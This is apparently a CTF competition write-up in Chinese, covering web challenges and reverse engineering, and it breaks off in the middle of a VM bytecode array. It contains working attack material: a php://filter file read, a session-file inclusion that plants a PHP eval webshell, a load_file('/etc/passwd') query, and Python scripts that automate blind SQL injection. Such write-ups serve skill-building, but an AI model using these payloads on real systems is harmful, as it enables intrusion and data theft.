web

第一题easy_ctf

  1. import re
  2. import requests
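  def frequencySort(s: str):
      """Return the characters of ``s`` regrouped by descending frequency.

      Each distinct character is repeated as many times as it occurs in ``s``.
      Characters with equal counts keep their first-seen order, which is the
      order ``Counter.most_common`` returns them in.
      """
      # The pasted listing had lost its indentation and carried list numbers;
      # this is the same logic laid out as valid Python.
      from collections import Counter

      return "".join(char * count for char, count in Counter(s).most_common())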
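  def getR(s: str):
      """Return the distinct characters of ``s`` from least to most frequent.

      ``frequencySort`` lists characters from most to least frequent, so keeping
      one copy of each character and reversing gives ascending frequency.
      """
      # dict.fromkeys keeps first-seen order and drops repeats in one pass,
      # replacing the repeated "char not in new_name" scan of the original.
      distinct = "".join(dict.fromkeys(frequencySort(s)))
      return distinct[::-1]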
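  # Challenge endpoint and request headers; the PHPSESSID cookie keeps the
  # fetched page and the submitted answers in the same server-side session.
  url = "http://120.79.191.238:47195"
  header = {
      "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36",
      'Cookie': 'PHPSESSID=srven1a0dqb9tnqg94ssg22sp5',
  }

  res = requests.get(url=url, headers=header)
  print(res.text)

  # The challenge string sits in the table cell that follows the "1600" attribute.
  pattern = re.compile(r'"1600">\r\n(.*?)<td>\r\n</tr>')
  result_site = re.findall(pattern, res.text)
  if not result_site:
      # Fail with a clear message instead of an IndexError on result_site[0].
      raise SystemExit("challenge string not found in the response")
  s = result_site[0]

  # NOTE(review): s is never re-read from the later responses, so all 20 posts
  # carry the same answer; it is computed once here instead of on every pass.
  answer = getR(s)
  for i in range(0, 20):
      data = {"ans": answer}
      res = requests.post(url=url, data=data, headers=header)
      # Only print responses that do not contain the "wrong answer" message.
      if "输入错误,请输入正确结果" not in res.text:
          print(res.text)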

提交有时间限制,手动计算再提交基本来不及,所以用上面的脚本完成。
image.png
flag{925e2ebe96725c75371fc60a5ab0ed1a}

第二题 in

文件读取
GET /action.php?file=php%3a%2f%2ffilter%2fconvert%2ebase64-encode%2fresource%3daction.php
image.png

<?php
// Page source as returned by the php://filter read shown above.
session_start();
// Turns off all PHP error reporting, so a failed include() produces no message.
error_reporting(0);
// Untrusted POST field, stored in the session without validation: the on-disk
// session file therefore contains bytes chosen by the client.
$name = $_POST['name'];
if($name){
    $_SESSION["username"] = $name;
}
// Vulnerable sink (local file inclusion): the raw `file` query parameter goes
// straight into include(), so stream wrappers and ../ traversal are accepted and
// any included file that contains PHP tags is executed.
// Mitigation: map the parameter onto a fixed allowlist (the page only links
// 1.txt and 2.txt) and output the file with readfile() instead of include().
include($_GET['file']);
?>
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<a href=action.php?file=1.txt>my dairy</a>
<a href=action.php?file=2.txt>my booklist</a>
</body>
</html>

包含session
利用条件:session 文件路径已知,且其中内容部分可控。
PHP 默认生成的 Session 文件往往存放在 /tmp 目录下
/tmp/sess_SESSIONID
?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7
session 文件一般在 /tmp 目录下,文件名格式为 sess_[your phpsessid value],有时候也可能在 /var/lib/php5 之类的目录下(由 session.save_path 决定),所以在此之前建议先读取配置文件确认路径。在某些特定的情况下,如果你能够控制 session 的值,也许你能够获得一个 shell

包含自己的
image.png
可以看到为index.php提交的name
提交<?php eval($_POST[‘pass’]);?>
image.png
然后包含这session文件
GET /action.php?file=../../../../../../../../../../../../tmp/sess_39533e14cd0c2c580dc800a3db282f4d
蚁剑链接pass
image.png

第三题 easysql

https://www.yuque.com/challenger-sfhjb/qn3zo3/eznmqo
和之前类似https://www.cnblogs.com/gtx690/p/13292473.html
但不报错且多过滤了sleep和union
只能布尔注入
先发一个主题为2的广告
闭合payload:

2'/**/&&/**/if(1=2,'',1)='       //返回不正常
2'/**/&&/**/if(1=1,'',1)='       //返回正常

写脚本

import re

import requests
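# Headers sent with every request below; the PHPSESSID cookie pins all of them
# to one session on the challenge server.
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36",
    'Cookie': 'PHPSESSID=48ecda2b3befa5ceca4d4a5166ab1dfe',
}
# Endpoint that stores a new ad (title / content / ac=add).
url2 = 'http://120.79.141.85:48192/addads.php'
# Ads added since the last reset; the main loop resets when this reaches 9.
# (The original `global cunt` was dropped: at module level it has no effect.)
cunt = 0
# Characters recovered so far.
flag = ""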
def emptyAndAdd(cunt):
    """Call empty.php, re-create the marker ad, and return ``cunt + 1``.

    The marker ad (title 2, content '888666ok') is the row whose content the
    main loop later looks for in the detail page.
    """
    # Step 1: request empty.php (presumably clears this session's ads).
    requests.get(url="http://120.79.141.85:48192/empty.php", headers=header)

    # Step 2: store the marker ad again.
    marker_ad = {'title': 2, 'content': '888666ok', 'ac': 'add'}
    requests.post(
        url='http://120.79.141.85:48192/addads.php',
        data=marker_ad,
        headers=header,
    )

    # One ad now exists, so the caller's counter moves on by one.
    return cunt + 1
def getid():
    """Return the id captured from the last ``detail.php?id=`` link on index.php.

    Raises IndexError when the listing contains no such link.
    """
    listing = requests.get(url="http://120.79.141.85:48192/index.php", headers=header)
    found_ids = re.findall(r"<a href='detail\.php\?id=(.*?)'>", listing.text)
    # The last link on the page is taken to be the most recently added ad.
    return found_ids[-1]

# Boolean-based blind read of the result of `content`, one character per outer
# iteration. The only signal used is whether the marker text '888666ok' shows
# up in the detail page of the ad that was just stored.
# NOTE(review): the stored title appears to be interpolated into the query run
# by detail.php (second-order injection) - confirm against the application
# source. Binding the stored value as a query parameter there removes the
# oracle; the keyword filter on addads.php does not.
cunt=emptyAndAdd(cunt)
print("请求第"+str(cunt))
for i in range(1,100):
    # Binary search over the character code at position i, range 32..128.
    low = 32
    high = 128
    while low < high:
        mid = (low + high)//2
        # After 9 stored ads the list is emptied and the marker ad re-created
        # (presumably the application caps the number of ads - TODO confirm).
        if cunt==9:
            cunt=0
            cunt=emptyAndAdd(cunt)
            # (debug) the request counter could be printed here
            print("-----------------------------------------------------------")
        # Store one more ad whose title carries the comparison for this step.
        cunt=cunt+1
        content = "select/**/user()"
        sql = f"2'/**/&&/**/if(ascii(substr(({content}),{i},1))<{mid},'',1)='"
        data2 = {'title': sql, 'content': 'ttt', 'ac': 'add'}
        print(sql)
        r = requests.post(url=url2, data=data2, headers=header)
        # Open the detail page of the newest ad (id taken from index.php).
        url1 = f'http://120.79.141.85:48192/detail.php?id={int(getid())}'
        rest = requests.get(url=url1, headers=header)
        if "888666ok" in rest.text:  # marker shown: character code < mid
            high = mid
        else:
            low = mid + 1
    # low == high == 32 means the code was below 32 at this position; treated
    # as the end of the value.
    if low == high == 32:
        print("No  result")
        break
    # After the search low == high == code + 1, so this appends chr(code).
    flag += chr((high + low - 1)//2)
    print(flag)

image.png
image.png
select/**/load_file('/etc/passwd') 也可以读文件,但 flag 在数据库里
image.png
过滤了mysql.innodb_table_stats、information_schema.tables、sys.schema_auto_increment_columns、union
但没过滤sys.schema_table_statistics_with_buffer
用上面的脚本盲猜 select/**/id/**/from/**/flag,结果存在(说明 flag 表存在)
参考:
https://blog.csdn.net/weixin_43940853/article/details/106164162

import re

import requests
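# Headers sent with every request below; the PHPSESSID cookie pins all of them
# to one session on the challenge server.
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36",
    'Cookie': 'PHPSESSID=824c09ba71fd6dd466f3c8511e9d1029',
}
# Endpoint that stores a new ad (title / content / ac=add).
url2 = 'http://120.79.141.85:48192/addads.php'
# Ads added since the last reset; the main loop resets when this reaches 9.
# (The original `global cunt` was dropped: at module level it has no effect.)
cunt = 0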
def add(flag):
    """Return ``flag`` appended to an empty string (unchanged for str input)."""
    return '' + flag
# Known prefix of the value; the loop below extends it one character at a time.
flag = "flag{"


def emptyAndAdd(c):
    """Call empty.php, re-create the marker ad, and return ``c + 1``.

    The marker ad (title 2, content '888666ok') is the row whose content the
    main loop later looks for in the detail page.
    """
    # Step 1: request empty.php (presumably clears this session's ads).
    requests.get(url="http://120.79.141.85:48192/empty.php", headers=header)

    # Step 2: store the marker ad again.
    marker_ad = {'title': 2, 'content': '888666ok', 'ac': 'add'}
    requests.post(
        url='http://120.79.141.85:48192/addads.php',
        data=marker_ad,
        headers=header,
    )

    # One ad now exists, so the caller's counter moves on by one.
    return c + 1

def getid():
    """Return the id captured from the last ``.php?id=`` link on index.php.

    Raises IndexError when the listing contains no such link.
    """
    listing = requests.get(url="http://120.79.141.85:48192/index.php", headers=header)
    found_ids = re.findall(r"\.php\?id=(.*?)'>", listing.text)
    # The last link on the page is taken to be the most recently added ad.
    return found_ids[-1]
import string
# Character-by-character recovery of the row in table `flag` without naming its
# columns: a guessed row (1, "<prefix + candidate>") is compared with
# (select * from flag), and the marker text '888666ok' in the detail page is
# the only signal used.
# NOTE(review): the keyword blocklist seen on addads.php ("标题含有敏感词汇")
# does not stop this; binding the stored title as a query parameter where it is
# later used would.
for i in range(1,200):
    # NOTE(review): string.printable is not in ascending byte order (digits,
    # lowercase, uppercase, punctuation, whitespace), so the chr(char-1) step
    # below looks reliable only while the value is digits and lowercase letters.
    for char in string.printable.encode():
        # After 9 stored ads the list is emptied and the marker ad re-created
        # (presumably the application caps the number of ads - TODO confirm).
        if cunt == 9:
            cunt = 0
            cunt = emptyAndAdd(cunt)
            # (debug) the request counter could be printed here
            print("-----------------------------------------------------------")
        # Store one more ad whose title carries the comparison for this candidate.
        cunt = cunt + 1
        hexchar = add(flag + chr(char))
        payload = '(select/**/1,"{}")>(select/**/*/**/from/**/flag)'.format(hexchar)
        sql = "2'/**/&&/**/if(({}),'',1)='".format(payload)
        data2 = {'title': sql, 'content': 'ttt', 'ac': 'add'}
        print(sql)
        r = requests.post(url=url2, data=data2, headers=header)
        # The application rejected this title as containing a filtered word;
        # skip the candidate.
        if "标题含有敏感词汇" in r.text:
            continue
        # Open the detail page of the newest ad (id taken from index.php).
        url1 = f'http://120.79.141.85:48192/detail.php?id={int(getid())}'
        rest = requests.get(url=url1, headers=header)
        # Marker shown: the guessed row compared greater than the stored row,
        # so the character before this candidate is appended.
        if "888666ok" in rest.text:
            flag = add(flag + chr(char-1))
            print(flag)
            break

image.png

re

pyre

解包
Writeup | 2022年第二届广东大学生网络安全攻防大赛-初赛 - 图10
Writeup | 2022年第二届广东大学生网络安全攻防大赛-初赛 - 图11
反编译
Writeup | 2022年第二届广东大学生网络安全攻防大赛-初赛 - 图12
解密
Writeup | 2022年第二届广东大学生网络安全攻防大赛-初赛 - 图13
Writeup | 2022年第二届广东大学生网络安全攻防大赛-初赛 - 图14

is this really vm

image.png
初步分析可以判定为虚拟机,并且它的指令形式为[offset1,offset2,offset3]。

利用py提取出他的程序执行流。

import time
def circular_shift_right(int_value, k, bit=8):
    """Rotate ``int_value`` right by ``k`` places within a ``bit``-wide field.

    The value is rendered as a zero-padded binary string, its last ``k`` digits
    are moved to the front, and the string is parsed back into an int. The
    format template and the padded string are printed as a trace.
    """
    template = '{:0%db}' % bit
    print(template)
    padded = template.format(int_value)
    print(padded)
    tail, head = padded[-k:], padded[:-k]
    return int(tail + head, 2)

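def qufan(int_value, bit=16):
    """Return the bitwise complement of ``int_value`` in a ``bit``-wide field.

    The value is rendered as a zero-padded binary string of width ``bit`` and
    every digit is flipped before parsing the string back into an int.
    """
    bin_value = ('{:0%db}' % bit).format(int_value)
    # Walk the whole padded string instead of a fixed 16 positions, so a
    # non-default ``bit`` is honoured (the original raised IndexError for
    # bit < 16 and dropped digits for bit > 16).
    flipped = "".join('1' if digit == '0' else '0' for digit in bin_value)
    return int(flipped, 2)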


def circular_shift_left(int_value, k, bit=16):
    """Rotate ``int_value`` left by ``k`` places within a ``bit``-wide field.

    The value is rendered as a zero-padded binary string, its first ``k`` digits
    are moved to the end, and the string is parsed back into an int.
    """
    padded = ('{:0%db}' % bit).format(int_value)
    head, tail = padded[:k], padded[k:]
    return int(tail + head, 2)

def fun(val1, val2):
    """Combine two values using only OR and ``qufan`` (inversion).

    Computes ``NOT(val1 | NOT val2) | NOT(NOT val1 | val2)``. By De Morgan
    this is ``(NOT val1 & val2) | (val1 & NOT val2)``, i.e. an XOR of the two
    operands, provided ``qufan`` behaves as a 16-bit NOT for them.
    """
    only_in_val2 = qufan(val1 | qufan(val2))
    only_in_val1 = qufan(qufan(val1) | val2)
    return only_in_val2 | only_in_val1

vmc=[6675, 6675, 7, 7, 7, 3, 312, 312, 7, 7, 7, 0, 314, 1, 313, 313, 7, 7, 7, 4, 6679, 6679, 7, 7, 7, 3, 332, 332, 7, 7, 7, 0, 334, 1, 333, 333, 7, 7, 7, 4, 6663, 6663, 7, 7, 7, 3, 352, 352, 7, 7, 7, 0, 354, 1, 353, 353, 7, 7, 7, 4, 6679, 6679, 7, 7, 7, 3, 372, 372, 7, 7, 7, 0, 374, 1, 373, 373, 7, 7, 7, 4, 6677, 6677, 7, 7, 7, 3, 392, 392, 7, 7, 7, 0, 394, 1, 393, 393, 7, 7, 7, 4, 6671, 6671, 7, 7, 7, 3, 412, 412, 7, 7, 7, 0, 414, 1, 413, 413, 7, 7, 7, 4, 6676, 6676, 7, 7, 7, 3, 432, 432, 7, 7, 7, 0, 434, 1, 433, 433, 7, 7, 7, 4, 446, 446, 7, 7, 7, 0, 448, 455, 447, 447, 7, 7, 7, 0, 0, 461, 461, 7, 7, 7, 0, 463, 1, 462, 462, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6635, 481, 481, 7, 7, 7, 0, 483, 1, 482, 482, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6636, 501, 501, 7, 7, 7, 0, 503, 1, 502, 502, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6637, 521, 521, 7, 7, 7, 0, 523, 1, 522, 522, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6638, 541, 541, 7, 7, 7, 0, 543, 1, 542, 542, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6639, 561, 561, 7, 7, 7, 0, 563, 1, 562, 562, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6640, 581, 581, 7, 7, 7, 0, 583, 1, 582, 582, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6641, 601, 601, 7, 7, 7, 0, 603, 1, 602, 602, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6642, 621, 621, 7, 7, 7, 0, 623, 1, 622, 622, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6643, 641, 641, 7, 7, 7, 0, 643, 1, 642, 642, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6644, 661, 661, 7, 7, 7, 0, 663, 1, 662, 662, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6645, 681, 681, 7, 7, 7, 0, 683, 1, 682, 682, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6646, 701, 701, 7, 7, 7, 0, 703, 1, 702, 702, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6647, 721, 721, 7, 7, 7, 0, 723, 1, 722, 722, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6648, 741, 741, 7, 7, 7, 0, 743, 1, 742, 742, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6649, 761, 761, 7, 7, 7, 0, 763, 1, 762, 762, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6650, 781, 781, 7, 7, 7, 0, 783, 1, 782, 782, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6651, 801, 801, 7, 7, 7, 0, 803, 1, 802, 802, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6652, 821, 821, 7, 7, 7, 0, 823, 1, 822, 822, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6653, 841, 841, 7, 7, 7, 
0, 843, 1, 842, 842, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6654, 861, 861, 7, 7, 7, 0, 863, 1, 862, 862, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6655, 881, 881, 7, 7, 7, 0, 883, 1, 882, 882, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6656, 901, 901, 7, 7, 7, 0, 903, 1, 902, 902, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6657, 921, 921, 7, 7, 7, 0, 923, 1, 922, 922, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6658, 941, 941, 7, 7, 7, 0, 943, 1, 942, 942, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6659, 961, 961, 7, 7, 7, 0, 964, 0, 0, 6635, 6635, 962, 6605, 6605, 963, 976, 976, 7, 7, 7, 0, 979, 0, 0, 6635, 6635, 977, 963, 963, 978, 977, 978, 7, 7, 7, 7, 7, 7, 963, 1000, 1000, 7, 7, 7, 0, 1003, 0, 0, 6605, 6605, 1001, 962, 962, 1002, 1001, 1002, 7, 7, 7, 7, 7, 7, 962, 962, 963, 7, 7, 7, 6602, 1030, 1030, 7, 7, 7, 0, 1033, 0, 0, 6602, 6602, 1031, 6631, 6631, 1032, 1045, 1045, 7, 7, 7, 0, 1048, 0, 0, 6602, 6602, 1046, 1032, 1032, 1047, 1046, 1047, 7, 7, 7, 7, 7, 7, 1032, 1069, 1069, 7, 7, 7, 0, 1072, 0, 0, 6631, 6631, 1070, 1031, 1031, 1071, 1070, 1071, 7, 7, 7, 7, 7, 7, 1031, 1031, 1032, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6636, 6636, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 1291, 1291, 7, 7, 7, 0, 1294, 0, 0, 6602, 6602, 1292, 6607, 6607, 1293, 1306, 1306, 7, 7, 7, 0, 1309, 0, 0, 6602, 6602, 1307, 1293, 1293, 1308, 1307, 1308, 7, 7, 7, 7, 7, 7, 1293, 1330, 1330, 7, 7, 
7, 0, 1333, 0, 0, 6607, 6607, 1331, 1292, 1292, 1332, 1331, 1332, 7, 7, 7, 7, 7, 7, 1292, 1292, 1293, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6637, 6637, 7, 7, 7, 6637, 1, 1, 7, 7, 7, 6602, 1378, 1378, 7, 7, 7, 0, 1381, 0, 0, 6602, 6602, 1379, 6608, 6608, 1380, 1393, 1393, 7, 7, 7, 0, 1396, 0, 0, 6602, 6602, 1394, 1380, 1380, 1395, 1394, 1395, 7, 7, 7, 7, 7, 7, 1380, 1417, 1417, 7, 7, 7, 0, 1420, 0, 0, 6608, 6608, 1418, 1379, 1379, 1419, 1418, 1419, 7, 7, 7, 7, 7, 7, 1379, 1379, 1380, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 1453, 1453, 7, 7, 7, 0, 1456, 0, 0, 6638, 6638, 1454, 6621, 6621, 1455, 1468, 1468, 7, 7, 7, 0, 1471, 0, 0, 6638, 6638, 1469, 1455, 1455, 1470, 1469, 1470, 7, 7, 7, 7, 7, 7, 1455, 1492, 1492, 7, 7, 7, 0, 1495, 0, 0, 6621, 6621, 1493, 1454, 1454, 1494, 1493, 1494, 7, 7, 7, 7, 7, 7, 1454, 1454, 1455, 7, 7, 7, 6602, 1522, 1522, 7, 7, 7, 0, 1525, 0, 0, 6602, 6602, 1523, 6624, 6624, 1524, 1537, 1537, 7, 7, 7, 0, 1540, 0, 0, 6602, 6602, 1538, 1524, 1524, 1539, 1538, 1539, 7, 7, 7, 7, 7, 7, 1524, 1561, 1561, 7, 7, 7, 0, 1564, 0, 0, 6624, 6624, 1562, 1523, 1523, 1563, 1562, 1563, 7, 7, 7, 7, 7, 7, 1523, 1523, 1524, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6639, 6639, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 1783, 1783, 7, 7, 7, 0, 1786, 0, 0, 6602, 6602, 1784, 6633, 6633, 
1785, 1798, 1798, 7, 7, 7, 0, 1801, 0, 0, 6602, 6602, 1799, 1785, 1785, 1800, 1799, 1800, 7, 7, 7, 7, 7, 7, 1785, 1822, 1822, 7, 7, 7, 0, 1825, 0, 0, 6633, 6633, 1823, 1784, 1784, 1824, 1823, 1824, 7, 7, 7, 7, 7, 7, 1784, 1784, 1785, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6640, 6640, 7, 7, 7, 6640, 1, 1, 7, 7, 7, 6602, 1870, 1870, 7, 7, 7, 0, 1873, 0, 0, 6602, 6602, 1871, 6610, 6610, 1872, 1885, 1885, 7, 7, 7, 0, 1888, 0, 0, 6602, 6602, 1886, 1872, 1872, 1887, 1886, 1887, 7, 7, 7, 7, 7, 7, 1872, 1909, 1909, 7, 7, 7, 0, 1912, 0, 0, 6610, 6610, 1910, 1871, 1871, 1911, 1910, 1911, 7, 7, 7, 7, 7, 7, 1871, 1871, 1872, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6641, 6641, 7, 7, 7, 6641, 1, 1, 7, 7, 7, 6602, 1957, 1957, 7, 7, 7, 0, 1960, 0, 0, 6602, 6602, 1958, 6618, 6618, 1959, 1972, 1972, 7, 7, 7, 0, 1975, 0, 0, 6602, 6602, 1973, 1959, 1959, 1974, 1973, 1974, 7, 7, 7, 7, 7, 7, 1959, 1996, 1996, 7, 7, 7, 0, 1999, 0, 0, 6618, 6618, 1997, 1958, 1958, 1998, 1997, 1998, 7, 7, 7, 7, 7, 7, 1958, 1958, 1959, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6642, 6642, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 2218, 2218, 7, 7, 7, 0, 2221, 0, 0, 6602, 6602, 2219, 6622, 6622, 2220, 2233, 2233, 7, 7, 7, 0, 2236, 0, 0, 6602, 6602, 2234, 2220, 2220, 2235, 2234, 2235, 7, 7, 7, 7, 7, 7, 2220, 2257, 2257, 7, 7, 7, 
0, 2260, 0, 0, 6622, 6622, 2258, 2219, 2219, 2259, 2258, 2259, 7, 7, 7, 7, 7, 7, 2219, 2219, 2220, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 2293, 2293, 7, 7, 7, 0, 2296, 0, 0, 6643, 6643, 2294, 6629, 6629, 2295, 2308, 2308, 7, 7, 7, 0, 2311, 0, 0, 6643, 6643, 2309, 2295, 2295, 2310, 2309, 2310, 7, 7, 7, 7, 7, 7, 2295, 2332, 2332, 7, 7, 7, 0, 2335, 0, 0, 6629, 6629, 2333, 2294, 2294, 2334, 2333, 2334, 7, 7, 7, 7, 7, 7, 2294, 2294, 2295, 7, 7, 7, 6602, 2362, 2362, 7, 7, 7, 0, 2365, 0, 0, 6602, 6602, 2363, 6606, 6606, 2364, 2377, 2377, 7, 7, 7, 0, 2380, 0, 0, 6602, 6602, 2378, 2364, 2364, 2379, 2378, 2379, 7, 7, 7, 7, 7, 7, 2364, 2401, 2401, 7, 7, 7, 0, 2404, 0, 0, 6606, 6606, 2402, 2363, 2363, 2403, 2402, 2403, 7, 7, 7, 7, 7, 7, 2363, 2363, 2364, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6644, 6644, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 2623, 2623, 7, 7, 7, 0, 2626, 0, 0, 6602, 6602, 2624, 6617, 6617, 2625, 2638, 2638, 7, 7, 7, 0, 2641, 0, 0, 6602, 6602, 2639, 2625, 2625, 2640, 2639, 2640, 7, 7, 7, 7, 7, 7, 2625, 2662, 2662, 7, 7, 7, 0, 2665, 0, 0, 6617, 6617, 2663, 2624, 2624, 2664, 2663, 2664, 7, 7, 7, 7, 7, 7, 2624, 2624, 2625, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 2698, 2698, 7, 7, 7, 0, 2701, 0, 0, 6645, 6645, 2699, 6603, 6603, 2700, 2713, 2713, 7, 7, 7, 0, 2716, 0, 0, 6645, 
6645, 2714, 2700, 2700, 2715, 2714, 2715, 7, 7, 7, 7, 7, 7, 2700, 2737, 2737, 7, 7, 7, 0, 2740, 0, 0, 6603, 6603, 2738, 2699, 2699, 2739, 2738, 2739, 7, 7, 7, 7, 7, 7, 2699, 2699, 2700, 7, 7, 7, 6602, 2767, 2767, 7, 7, 7, 0, 2770, 0, 0, 6602, 6602, 2768, 6615, 6615, 2769, 2782, 2782, 7, 7, 7, 0, 2785, 0, 0, 6602, 6602, 2783, 2769, 2769, 2784, 2783, 2784, 7, 7, 7, 7, 7, 7, 2769, 2806, 2806, 7, 7, 7, 0, 2809, 0, 0, 6615, 6615, 2807, 2768, 2768, 2808, 2807, 2808, 7, 7, 7, 7, 7, 7, 2768, 2768, 2769, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6646, 6646, 7, 7, 7, 6646, 1, 1, 7, 7, 7, 6602, 2854, 2854, 7, 7, 7, 0, 2857, 0, 0, 6602, 6602, 2855, 6634, 6634, 2856, 2869, 2869, 7, 7, 7, 0, 2872, 0, 0, 6602, 6602, 2870, 2856, 2856, 2871, 2870, 2871, 7, 7, 7, 7, 7, 7, 2856, 2893, 2893, 7, 7, 7, 0, 2896, 0, 0, 6634, 6634, 2894, 2855, 